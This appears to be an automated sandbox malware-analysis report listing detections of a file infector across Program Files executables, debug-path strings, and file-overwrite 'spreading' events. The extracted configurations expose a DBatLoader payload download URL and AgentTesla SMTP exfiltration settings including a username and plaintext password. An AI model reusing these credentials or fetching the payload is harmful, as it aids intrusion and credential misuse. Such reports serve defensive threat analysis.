Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C6dAUcOA6M.exe; Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
Source: Native_neworigin.exe.7892.40.memstrmin; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
Source: deoci.biz; Virustotal: Detection: 14%
Source: nqwjmb.biz; Virustotal: Detection: 13%
Source: wllvnzb.biz; Virustotal: Detection: 13%
Source: dwrqljrr.biz; Virustotal: Detection: 15%
Source: C6dAUcOA6M.exe; ReversingLabs: Detection: 63%
Source: C6dAUcOA6M.exe; Virustotal: Detection: 62%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                    Source: C6dAUcOA6M.exeJoe Sandbox ML: detected
                    Source: C6dAUcOA6M.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49826 version: TLS 1.2
                    Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: aymtmquJ.pif, 0000000B.00000003.1450910858.000000001BE00000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: PresentationFontCache.pdb source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: _.pdb source: Native_neworigin.exe, 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1468315609.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: crashreporter.pdb source: alg.exe, 00000011.00000003.2498331114.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: plugin-container.pdb source: alg.exe, 00000011.00000003.2595573568.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdbAAAGCTL source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B0E000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002AB4000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021ADF000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: pingsender.pdb source: alg.exe, 00000011.00000003.2573538319.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: private_browsing.pdb source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1420748141.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1440012872.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
                    Source: Binary string: easinvoker.pdbH source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mavinject32.pdb source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: 64BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2230247874.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000011.00000003.2208687784.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdbP source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: private_browsing.pdbp source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdb source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: alg.exe, 00000011.00000003.2708273963.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: updater.pdb source: alg.exe, 00000011.00000003.2628176522.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp

                    Spreading

                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Windows\System32\AppVClient.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\7-Zip\7zG.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
